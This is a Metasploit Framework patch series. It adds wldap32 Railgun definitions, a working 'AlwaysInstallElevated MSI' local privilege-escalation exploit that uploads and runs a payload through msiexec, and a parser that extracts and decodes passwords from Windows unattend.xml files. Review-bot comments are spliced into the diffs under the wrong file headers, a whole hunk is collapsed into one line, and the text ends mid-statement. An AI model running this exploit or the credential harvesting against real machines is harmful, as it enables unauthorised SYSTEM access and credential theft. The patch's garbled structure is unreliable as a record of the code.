From e057467329e98ff334820916e924d601af3371f8 Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Sun, 18 Nov 2012 21:24:49 +0000
Subject: [PATCH 001/421] Initial attempt
---
.../stdapi/railgun/def/def_wldap32.rb | 34 +
.../extensions/stdapi/railgun/railgun.rb | 597 +++++++++---------
2 files changed, 333 insertions(+), 298 deletions(-)
create mode 100644 lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb
new file mode 100644
index 000000000000..e13e618f5481
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb
@@ -0,0 +1,34 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Railgun
+module Def
+
+class Def_wldap32
+
+ def self.create_dll(dll_path = 'wldap32')
+ dll = DLL.new(dll_path, ApiConstants.manager)
+
+ dll.add_function( 'ldap_sslinitW', 'PDWORD',[
+ ['PCHAR', 'HostName', 'in'],
+ ['DWORD', 'PortNumber', 'in'],
+ ['DWORD', 'secure', 'in']
+ ])
+
+ dll.add_function( 'ldap_simple_bind_sW', 'DWORD',[
+ ['DWORD', 'ld', 'in'],
+ ['PCHAR', 'dn', 'in'],
+ ['PCHAR', 'passwd', 'in']
+ ])
+
+ return dll
+ end
+
+end
+
+end; end; end; end; end; end; end
+
+
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
index 549cc8aa28e4..9c5dc4651c71 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
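Review bot: Both definitions in `create_dll` bind the wide-character (`W`) exports but declare their string arguments as `'PCHAR'`, so `HostName`, `dn` and `passwd` would be marshalled as byte strings where the API expects UTF-16; either declare them `'PWCHAR'` or bind the `A` exports instead. The connection handle is also inconsistent: `ldap_sslinitW` is declared to return `'PDWORD'` while `ldap_simple_bind_sW` takes `ld` as a `'DWORD'`, which would truncate a pointer-sized handle on an x64 session; `['LPVOID', 'ld', 'in']` looks safer, though that should be confirmed against how Railgun sizes each type. A short comment above `create_dll` noting that `passwd` carries a cleartext bind credential would also help anyone auditing what this definition sends over the session.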
@@ -1,298 +1,299 @@ -# -*- coding: binary -*- -# Copyright (c) 2010, patrickHVE@googlemail.com -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * The names of the author may not be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# -# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. 
-# - -# -# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything -# - -require 'pp' -require 'enumerator' - -require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' -require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' -require 'rex/post/meterpreter/extensions/stdapi/railgun/util' -require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' -require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' - -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun - - -# -# The Railgun class to dynamically expose the Windows API. -# -class Railgun - - # - # Railgun::DLL's that have builtin definitions. - # - # If you want to add additional DLL definitions to be preloaded create a - # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. - # Naming is important and should follow convention. For example, if your - # dll's name was "my_dll" - # file name: def_my_dll.rb - # class name: Def_my_dll - # entry below: 'my_dll' - # - BUILTIN_DLLS = [ - 'kernel32', - 'ntdll', - 'user32', - 'ws2_32', - 'iphlpapi', - 'advapi32', - 'shell32', - 'netapi32', - 'crypt32', - 'wlanapi', - ].freeze - - ## - # Returns a Hash containing DLLs added to this instance with #add_dll - # as well as references to any frozen cached dlls added directly in #get_dll - # and copies of any frozen dlls (added directly with #add_function) - # that the user attempted to modify with #add_function. - # - # Keys are friendly DLL names and values are the corresponding DLL instance - attr_accessor :dlls - - ## - # Contains a reference to the client that corresponds to this instance of railgun - attr_accessor :client - - ## - # These DLLs are loaded lazily and then shared amongst all railgun instances. 
- # For safety reasons this variable should only be read/written within #get_dll. - @@cached_dlls = {} - - # if you are going to touch @@cached_dlls, wear protection - @@cache_semaphore = Mutex.new - - def initialize(client) - self.client = client - self.dlls = {} - end - - def self.builtin_dlls - BUILTIN_DLLS - end - - # - # Return this Railgun's Util instance. - # - def util - if @util.nil? - @util = Util.new(self, client.platform) - end - - return @util - end - - # - # Return this Railgun's WinConstManager instance, initially populated with - # constants defined in ApiConstants. - # - def constant_manager - # Loads lazily - return ApiConstants.manager - end - - # - # Read data from a memory address on the host (useful for working with - # LPVOID parameters) - # - def memread(address, length) - - raise "Invalid parameters." if(not address or not length) - - request = Packet.create_request('stdapi_railgun_memread') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) - end - - return nil - end - - # - # Write data to a memory address on the host (useful for working with - # LPVOID parameters) - # - def memwrite(address, data, length) - - raise "Invalid parameters." if(not address or not data or not length) - - request = Packet.create_request('stdapi_railgun_memwrite') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return true - end - - return false - end - - # - # Adds a function to an existing DLL definition. - # - # If the DLL definition is frozen (ideally this should be the case for all - # cached dlls) an unfrozen copy is created and used henceforth for this - # instance. 
- # - def add_function(dll_name, function_name, return_type, params, windows_name=nil) - - unless known_dll_names.include?(dll_name) - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" - end - - dll = get_dll(dll_name) - - # For backwards compatibility, we ensure the dll is thawed - if dll.frozen? - # Duplicate not only the dll, but its functions as well. Frozen status will be lost - dll = Marshal.load(Marshal.dump(dll)) - - # Update local dlls with the modifiable duplicate - dlls[dll_name] = dll - end - - dll.add_function(function_name, return_type, params, windows_name) - end - - # - # Adds a DLL to this Railgun. - # - # The +windows_name+ is the name used on the remote system and should be - # set appropriately if you want to include a path or the DLL name contains - # non-ruby-approved characters. - # - # Raises an exception if a dll with the given name has already been - # defined. - # - def add_dll(dll_name, windows_name=dll_name) - - if dlls.has_key? dll_name - raise "A DLL of name #{dll_name} has already been loaded." - end - - dlls[dll_name] = DLL.new(windows_name, constant_manager) - end - - - def known_dll_names - return BUILTIN_DLLS | dlls.keys - end - - # - # Attempts to provide a DLL instance of the given name. Handles lazy - # loading and caching. Note that if a DLL of the given name does not - # exist, returns nil - # - def get_dll(dll_name) - - # If the DLL is not local, we now either load it from cache or load it lazily. - # In either case, a reference to the dll is stored in the collection "dlls" - # If the DLL can not be found/created, no actions are taken - unless dlls.has_key? dll_name - # We read and write to @@cached_dlls and rely on state consistency - @@cache_semaphore.synchronize do - if @@cached_dlls.has_key? dll_name - dlls[dll_name] = @@cached_dlls[dll_name] - elsif BUILTIN_DLLS.include? 
dll_name - # I highly doubt this case will ever occur, but I am paranoid - if dll_name !~ /^\w+$/ - raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" - end - - require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name - dll = Def.const_get('Def_' << dll_name).create_dll.freeze - - @@cached_dlls[dll_name] = dll - dlls[dll_name] = dll - end - end - - end - - return dlls[dll_name] - end - - # - # Fake having members like user32 and kernel32. - # reason is that - # ...user32.MessageBoxW() - # is prettier than - # ...dlls["user32"].functions["MessageBoxW"]() - # - def method_missing(dll_symbol, *args) - dll_name = dll_symbol.to_s - - unless known_dll_names.include? dll_name - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" - end - - dll = get_dll(dll_name) - - return DLLWrapper.new(dll, client) - end - - # - # Return a Windows constant matching +str+. - # - def const(str) - return constant_manager.parse(str) - end - - # - # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) - # - def multi(functions) - if @multicaller.nil? - @multicaller = MultiCaller.new(client, self) - end - - return @multicaller.call(functions) - end -end - -end; end; end; end; end; end +# -*- coding: binary -*- +# Copyright (c) 2010, patrickHVE@googlemail.com +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * The names of the author may not be used to endorse or promote products +# derived from this software without specific prior written permission. 
+# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +# +# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. +# + +# +# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything +# + +require 'pp' +require 'enumerator' + +require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' +require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' +require 'rex/post/meterpreter/extensions/stdapi/railgun/util' +require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' +require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' + +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun + + +# +# The Railgun class to dynamically expose the Windows API. +# +class Railgun + + # + # Railgun::DLL's that have builtin definitions. + # + # If you want to add additional DLL definitions to be preloaded create a + # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. + # Naming is important and should follow convention. 
For example, if your + # dll's name was "my_dll" + # file name: def_my_dll.rb + # class name: Def_my_dll + # entry below: 'my_dll' + # + BUILTIN_DLLS = [ + 'kernel32', + 'ntdll', + 'user32', + 'ws2_32', + 'iphlpapi', + 'advapi32', + 'shell32', + 'netapi32', + 'crypt32', + 'wlanapi', + 'wldap32' + ].freeze + + ## + # Returns a Hash containing DLLs added to this instance with #add_dll + # as well as references to any frozen cached dlls added directly in #get_dll + # and copies of any frozen dlls (added directly with #add_function) + # that the user attempted to modify with #add_function. + # + # Keys are friendly DLL names and values are the corresponding DLL instance + attr_accessor :dlls + + ## + # Contains a reference to the client that corresponds to this instance of railgun + attr_accessor :client + + ## + # These DLLs are loaded lazily and then shared amongst all railgun instances. + # For safety reasons this variable should only be read/written within #get_dll. + @@cached_dlls = {} + + # if you are going to touch @@cached_dlls, wear protection + @@cache_semaphore = Mutex.new + + def initialize(client) + self.client = client + self.dlls = {} + end + + def self.builtin_dlls + BUILTIN_DLLS + end + + # + # Return this Railgun's Util instance. + # + def util + if @util.nil? + @util = Util.new(self, client.platform) + end + + return @util + end + + # + # Return this Railgun's WinConstManager instance, initially populated with + # constants defined in ApiConstants. + # + def constant_manager + # Loads lazily + return ApiConstants.manager + end + + # + # Read data from a memory address on the host (useful for working with + # LPVOID parameters) + # + def memread(address, length) + + raise "Invalid parameters." 
if(not address or not length) + + request = Packet.create_request('stdapi_railgun_memread') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) + end + + return nil + end + + # + # Write data to a memory address on the host (useful for working with + # LPVOID parameters) + # + def memwrite(address, data, length) + + raise "Invalid parameters." if(not address or not data or not length) + + request = Packet.create_request('stdapi_railgun_memwrite') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return true + end + + return false + end + + # + # Adds a function to an existing DLL definition. + # + # If the DLL definition is frozen (ideally this should be the case for all + # cached dlls) an unfrozen copy is created and used henceforth for this + # instance. + # + def add_function(dll_name, function_name, return_type, params, windows_name=nil) + + unless known_dll_names.include?(dll_name) + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" + end + + dll = get_dll(dll_name) + + # For backwards compatibility, we ensure the dll is thawed + if dll.frozen? + # Duplicate not only the dll, but its functions as well. Frozen status will be lost + dll = Marshal.load(Marshal.dump(dll)) + + # Update local dlls with the modifiable duplicate + dlls[dll_name] = dll + end + + dll.add_function(function_name, return_type, params, windows_name) + end + + # + # Adds a DLL to this Railgun. + # + # The +windows_name+ is the name used on the remote system and should be + # set appropriately if you want to include a path or the DLL name contains + # non-ruby-approved characters. 
+ # + # Raises an exception if a dll with the given name has already been + # defined. + # + def add_dll(dll_name, windows_name=dll_name) + + if dlls.has_key? dll_name + raise "A DLL of name #{dll_name} has already been loaded." + end + + dlls[dll_name] = DLL.new(windows_name, constant_manager) + end + + + def known_dll_names + return BUILTIN_DLLS | dlls.keys + end + + # + # Attempts to provide a DLL instance of the given name. Handles lazy + # loading and caching. Note that if a DLL of the given name does not + # exist, returns nil + # + def get_dll(dll_name) + + # If the DLL is not local, we now either load it from cache or load it lazily. + # In either case, a reference to the dll is stored in the collection "dlls" + # If the DLL can not be found/created, no actions are taken + unless dlls.has_key? dll_name + # We read and write to @@cached_dlls and rely on state consistency + @@cache_semaphore.synchronize do + if @@cached_dlls.has_key? dll_name + dlls[dll_name] = @@cached_dlls[dll_name] + elsif BUILTIN_DLLS.include? dll_name + # I highly doubt this case will ever occur, but I am paranoid + if dll_name !~ /^\w+$/ + raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" + end + + require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name + dll = Def.const_get('Def_' << dll_name).create_dll.freeze + + @@cached_dlls[dll_name] = dll + dlls[dll_name] = dll + end + end + + end + + return dlls[dll_name] + end + + # + # Fake having members like user32 and kernel32. + # reason is that + # ...user32.MessageBoxW() + # is prettier than + # ...dlls["user32"].functions["MessageBoxW"]() + # + def method_missing(dll_symbol, *args) + dll_name = dll_symbol.to_s + + unless known_dll_names.include? dll_name + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" + end + + dll = get_dll(dll_name) + + return DLLWrapper.new(dll, client) + end + + # + # Return a Windows constant matching +str+. 
+ #
+ def const(str)
+ return constant_manager.parse(str)
+ end
+
+ #
+ # The multi-call shorthand (["kernel32", "ExitProcess", [0]])
+ #
+ def multi(functions)
+ if @multicaller.nil?
+ @multicaller = MultiCaller.new(client, self)
+ end
+
+ return @multicaller.call(functions)
+ end
+end
+
+end; end; end; end; end; end
From d9117224912d76ca0b0991694eea83b2ac192811 Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Wed, 28 Nov 2012 16:36:57 +0000
Subject: [PATCH 002/421] Add initial auto run script
---
.../windows/local/always_install_elevated.rb | 174 ++++++++++++++++++
1 file changed, 174 insertions(+)
create mode 100644 modules/exploits/windows/local/always_install_elevated.rb
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb
new file mode 100644
index 000000000000..9569bb6f2ea9
--- /dev/null
+++ b/modules/exploits/windows/local/always_install_elevated.rb
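Review bot: This hunk rewrites all 298 lines of railgun.rb, yet the only visible content difference is the new `'wldap32'` entry in `BUILTIN_DLLS`; the rest looks like a line-ending or whitespace conversion (inferred, since the removed and added text read the same here). That buries a one-line change in a 597-line diff and breaks blame history, so I would restore the file's original line endings and commit only `'wldap32',` (with the trailing comma the other entries carry). Separately, the guard in `get_dll` that precedes the dynamic `require` uses `/^\w+$/`, which anchors per line; `/\A\w+\z/` is the whole-string form, though that line predates this commit.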
@@ -0,0 +1,174 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = AverageRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Windows::Registry
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'Windows AlwaysInstallElevated MSI',
+ 'Description' => %q{
+ This module checks the AlwaysInstallElevated registry keys which
+ dictate if .MSI files should be installed with elevated privileges
+ (NT AUTHORITY\SYSTEM).
+
+ The default MSI file is data/exploits/exec_payload.msi with the WiX source
+ file under external/source/exploits/exec_payload_msi/exec_payload.wxs.
+ This MSI simply executes payload.exe within the same folder.
+
+ The MSI may not execute succesfully successive times, but may be able to
+ get around this by regenerating the MSI.
+
+ MSI can be rebuilt from the source using the WIX tool with the following commands:
+ candle exec_payload.wxs
+ light exec_payload.wixobj
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ben Campbell',
+ 'Parvez Anwar' # discovery?/inspiration
+ ],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread',
+ 'InitialAutoRunScript' => 'migrate -k -f'
+ },
+ 'Targets' =>
+ [
+ [ 'Windows', { } ],
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
+ [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
+ [ 'URL', 'http://wix.sourceforge.net'] ,
+ ],
+ 'DisclosureDate'=> 'Mar 18 2010',
+ 'DefaultTarget' => 0
+ }))
+
+ register_advanced_options([
+ OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
+ OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
+ ], self.class)
+ end
+
+ def check
+ install_elevated = "AlwaysInstallElevated"
+ installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
+ hkcu = "HKEY_CURRENT_USER\\#{installer}"
+ hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
+
+ local_machine_value = registry_getvaldata(hklm,install_elevated)
+
+ if local_machine_value.nil?
+ print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
+ return Msf::Exploit::CheckCode::Safe
+ elsif local_machine_value == 0
+ print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+ return Msf::Exploit::CheckCode::Safe
+ else
+ print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+ current_user_value = registry_getvaldata(hkcu,install_elevated)
+
+ if current_user_value.nil?
+ print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
+ return Msf::Exploit::CheckCode::Safe
+ elsif current_user_value == 0
+ print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+ return Msf::Exploit::CheckCode::Safe
+ else
+ print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+ return Msf::Exploit::CheckCode::Vulnerable
+ end
+ end
+ end
+
+ def cleanup
+ if @executed
+ begin
+ print_status("Deleting MSI...")
+ file_rm(@msi_destination)
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error(e.to_s)
+ print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
+ end
+
+ begin
+ print_status("Deleting Payload...")
+ file_rm(@payload_destination)
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error(e.to_s)
+ print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
+ end
+ end
+ end
+
+ def exploit
+ @executed = false
+ if check == Msf::Exploit::CheckCode::Vulnerable
+ @executed = true
+
+ msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+ msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+
+ # Upload MSI
+ @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+ print_status("Uploading the MSI to #{@msi_destination} ...")
+
+ #upload_file - ::File.read doesn't appear to work in windows...
+ source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+ write_file(@msi_destination, source)
+
+ # Upload payload
+ payload = generate_payload_exe
+ @payload_destination = expand_path("%TEMP%\\payload.exe").strip
+ print_status("Uploading the Payload to #{@payload_destination} ...")
+ write_file(@payload_destination, payload)
+
+ # Execute MSI
+ print_status("Executing MSI...")
+
+ if datastore['LOG_FILE'].nil?
+ logging = ""
+ else
+ logging = "/l* #{datastore['LOG_FILE']} "
+ end
+
+ if datastore['QUIET']
+ quiet = "/quiet "
+ else
+ quiet = ""
+ end
+
+ cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+ vprint_status("Executing: #{cmd}")
+ begin
+ result = cmd_exec(cmd)
+ rescue Rex::TimeoutError
+ vprint_status("Execution timed out.")
+ end
+ vprint_status("MSI command-line feedback: #{result}")
+ end
+ end
+end
From e60d10bd3d3303e8122116f7d2c22fc13bfa4c68 Mon Sep 17 00:00:00 2001
From: Meatballs1
Date: Thu, 13 Dec 2012 09:40:36 +0000
Subject: [PATCH 003/421] Repackage as single module pull
---
lib/rex/parser/unattend.rb | 128 ++++++++++
lib/rex/proto/dcerpc/client.rb | 9 +-
lib/rex/proto/dcerpc/packet.rb | 10 +-
lib/rex/proto/dcerpc/wdscp.rb | 3 +
lib/rex/proto/dcerpc/wdscp/constants.rb | 89 +++++++
lib/rex/proto/dcerpc/wdscp/packet.rb | 74 ++++++
.../dcerpc/windows_deployment_services.rb | 221 ++++++++++++++++++
7 files changed, 530 insertions(+), 4 deletions(-)
create mode 100644 lib/rex/parser/unattend.rb
create mode 100644 lib/rex/proto/dcerpc/wdscp.rb
create mode 100644 lib/rex/proto/dcerpc/wdscp/constants.rb
create mode 100644 lib/rex/proto/dcerpc/wdscp/packet.rb
create mode 100644 modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb
diff --git a/lib/rex/parser/unattend.rb b/lib/rex/parser/unattend.rb
new file mode 100644
index 000000000000..f760410c3fdf
--- /dev/null
+++ b/lib/rex/parser/unattend.rb
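Review bot: `cleanup` is overridden without calling `super`, so any cleanup defined by the parent class or the included mixins is skipped; adding `super` as the first line of `cleanup` keeps that chain intact. `@executed` is also set to true before either `write_file` call, so a failed upload still leads `cleanup` to attempt `file_rm` on paths that may be nil or were never written; setting the flag after the uploads, or guarding each `file_rm` on its own path, avoids the spurious errors. On documentation, the description never states the remediation for the condition `check` reports: a sentence such as `Setting AlwaysInstallElevated to 0, or removing it, under either HKLM or HKCU SOFTWARE\Policies\Microsoft\Windows\Installer prevents elevated MSI installs.` would tell a reader of the module output what to fix.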
@@ -0,0 +1,128 @@
+# -*- coding: binary -*-
+#
+
+module Rex
+module Parser
+class Unattend
+
+ def self.parse(xml)
+ results = []
+ unattend = xml.elements['unattend']
+ return if unattend.nil?
+ unattend.each_element do |settings|
+ next if settings.class != REXML::Element
+ settings.get_elements('component').each do |c|
+ next if c.class != REXML::Element
+ results << extract_useraccounts(c.elements['UserAccounts'])
+ results << extract_autologon(c.elements['AutoLogon'])
+ results << extract_deployment(c.elements['WindowsDeploymentServices'])
+ end
+ end
+ return results.flatten
+ end
+
+ #
+ # Extract sensitive data from Deployment Services.
+ # We can only seem to add one with Windows System Image Manager, so
+ # we'll only enum one.
+ #
+ def self.extract_deployment(deployment)
+ return [] if deployment.nil?
+ domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue ''
+ username = deployment.elements['Login/Credentials/Username'].get_text.value rescue ''
+ password = deployment.elements['Login/Credentials/Password'].get_text.value rescue ''
+ plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true'
+
+ if plaintext == 'false'
+ password = Rex::Text.decode_base64(password)
+ password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
+ end
+
+ return {'type' => 'wds', 'domain' => domain, 'username' => username, 'password' => password }
+ end
+
+ #
+ # Extract sensitive data from AutoLogon
+ #
+ def self.extract_autologon(auto_logon)
+ return [] if auto_logon.nil?
+
+ domain = auto_logon.elements['Domain'].get_text.value rescue ''
+ username = auto_logon.elements['Username'].get_text.value rescue ''
+ password = auto_logon.elements['Password/Value'].get_text.value rescue ''
+ plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true'
+
+ if plaintext == 'false'
+ password = Rex::Text.decode_base64(password)
+ password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
+ end
+
+ return {'type' => 'auto', 'domain' => domain, 'username' => username, 'password' => password }
+ end
+
+ #
+ # Extract sensitive data from UserAccounts
+ #
+ def self.extract_useraccounts(user_accounts)
+ return[] if user_accounts.nil?
+
+ results = []
+ account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts']
+ account_types.each do |t|
+ element = user_accounts.elements[t]
+ next if element.nil?
+
+ case t
+ #
+ # Extract the password from AdministratorPasswords
+ #
+ when account_types[0]
+ password = element.elements['Value'].get_text.value rescue ''
+ plaintext = element.elements['PlainText'].get_text.value rescue 'true'
+
+ if plaintext == 'false'
+ password = Rex::Text.decode_base64(password)
+ password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '')
+ end
+
+ if not password.empty?
+ results << {'type' => 'admin', 'username' => 'Administrator', 'password' => password}
+ end
+
+ #
+ # Extract the sensitive data from DomainAccounts.
+ # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts + # + when account_types[1] #DomainAccounts + element.elements.each do |account_list| + name = account_list.elements['DomainAccount/Name'].get_text.value rescue '' + group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true' + + results << {'type' => 'domain', 'username' => name, 'group' => group} + end + # + # Extract the username/password from LocalAccounts + # + when account_types[2] #LocalAccounts + element.elements.each do |local| + password = local.elements['Password/Value'].get_text.value rescue '' + plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true' + + if plaintext == 'false' + password = Rex::Text.decode_base64(password) + password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '') + end + + username = local.elements['Name'].get_text.value rescue '' + results << {'type' => 'local', 'username' => username, 'password' => password} + end + end + end + + return results + end + +end +end +end + diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index 928e5eb4bfc2..c4aaaa6f3acb 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -252,7 +252,14 @@ def bind() bind, context = Rex::Proto::DCERPC::Packet.make_bind_fake_multi(*args) else - bind, context = Rex::Proto::DCERPC::Packet.make_bind(self.handle.uuid[0], self.handle.uuid[1]) + if self.handle.uuid.length == 4 + bind, context = Rex::Proto::DCERPC::Packet.make_bind( self.handle.uuid[0], + self.handle.uuid[1], + self.handle.uuid[2], + self.handle.uuid[3]) + else + bind, context = 